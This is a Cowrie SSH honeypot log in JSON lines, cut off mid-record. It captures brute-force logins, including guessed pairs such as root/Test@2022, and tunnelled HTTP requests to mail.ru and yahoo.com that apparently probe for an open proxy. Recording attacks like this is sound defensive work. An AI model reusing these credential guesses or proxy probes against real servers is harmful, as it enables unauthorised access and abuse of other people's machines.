{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.567228Z","src_ip":"77.83.207.83","session":"f131c3bd9088"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.817189Z","src_ip":"77.83.207.83","session":"f131c3bd9088"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":22533,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:22533","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.867995Z","session":"f131c3bd9088"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.905240Z","src_ip":"212.227.125.160","session":"b0399dc3c9a5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.905968Z","src_ip":"212.227.125.160","session":"b0399dc3c9a5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:11.918125Z","src_ip":"77.83.207.83","session":"f131c3bd9088"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":15797,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:15797","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.060326Z","session":"f131c3bd9088"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.110038Z","src_ip":"77.83.207.83","session":"f131c3bd9088"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":29409,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:29409","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.252225Z","session":"f131c3bd9088"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.302198Z","src_ip":"77.83.207.83","session":"f131c3bd9088"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.353039Z","src_ip":"77.83.207.83","session":"f131c3bd9088"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38666,"dst_ip":"1.2.3.4","dst_port":22,"session":"984661519077","protocol":"ssh","message":"New connection: 77.83.207.83:38666 (1.2.3.4:22) [session: 984661519077]","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.404233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.405088Z","src_ip":"77.83.207.83","session":"984661519077"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.456082Z","src_ip":"77.83.207.83","session":"984661519077"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.581145Z","src_ip":"212.227.125.160","session":"b0222a2b354e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.710130Z","src_ip":"77.83.207.83","session":"984661519077"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.762264Z","session":"984661519077"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.813389Z","src_ip":"77.83.207.83","session":"984661519077"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31179,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31179","sensor":"my-vps","timestamp":"2025-08-31T03:44:12.957161Z","session":"984661519077"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.008138Z","src_ip":"77.83.207.83","session":"984661519077"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":18041,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:18041","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.153491Z","session":"984661519077"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.204602Z","src_ip":"77.83.207.83","session":"984661519077"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.256658Z","src_ip":"77.83.207.83","session":"984661519077"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38762,"dst_ip":"1.2.3.4","dst_port":22,"session":"3b81c589df6f","protocol":"ssh","message":"New connection: 77.83.207.83:38762 (1.2.3.4:22) [session: 3b81c589df6f]","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.305737Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.306893Z","src_ip":"77.83.207.83","session":"3b81c589df6f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.356956Z","src_ip":"77.83.207.83","session":"3b81c589df6f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.607745Z","src_ip":"77.83.207.83","session":"3b81c589df6f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":11019,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:11019","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.658920Z","session":"3b81c589df6f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.709242Z","src_ip":"77.83.207.83","session":"3b81c589df6f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":18112,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:18112","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.852565Z","session":"3b81c589df6f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:13.902723Z","src_ip":"77.83.207.83","session":"3b81c589df6f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":6074,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:6074","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.044595Z","session":"3b81c589df6f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.094930Z","src_ip":"77.83.207.83","session":"3b81c589df6f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.145930Z","src_ip":"77.83.207.83","session":"3b81c589df6f"}
{"eventid":"cowrie.login.failed","username":"hadoop","password":"P@ssw0rd123","message":"login attempt [hadoop/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.167650Z","src_ip":"212.227.125.160","session":"b0399dc3c9a5"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38867,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fd1d30fb8dd","protocol":"ssh","message":"New connection: 77.83.207.83:38867 (1.2.3.4:22) [session: 9fd1d30fb8dd]","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.194383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.195327Z","src_ip":"77.83.207.83","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.245273Z","src_ip":"77.83.207.83","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.493666Z","src_ip":"77.83.207.83","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14802,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:14802","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.544422Z","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.594367Z","src_ip":"77.83.207.83","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":22740,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:22740","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.736334Z","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.786182Z","src_ip":"77.83.207.83","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":22964,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:22964","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.928103Z","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:44:14.977957Z","src_ip":"77.83.207.83","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.029119Z","src_ip":"77.83.207.83","session":"9fd1d30fb8dd"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":38941,"dst_ip":"1.2.3.4","dst_port":22,"session":"351164b82340","protocol":"ssh","message":"New connection: 77.83.207.83:38941 (1.2.3.4:22) [session: 351164b82340]","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.078219Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:44:15.079129Z","src_ip":"77.83.207.83","session":"351164b82340"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha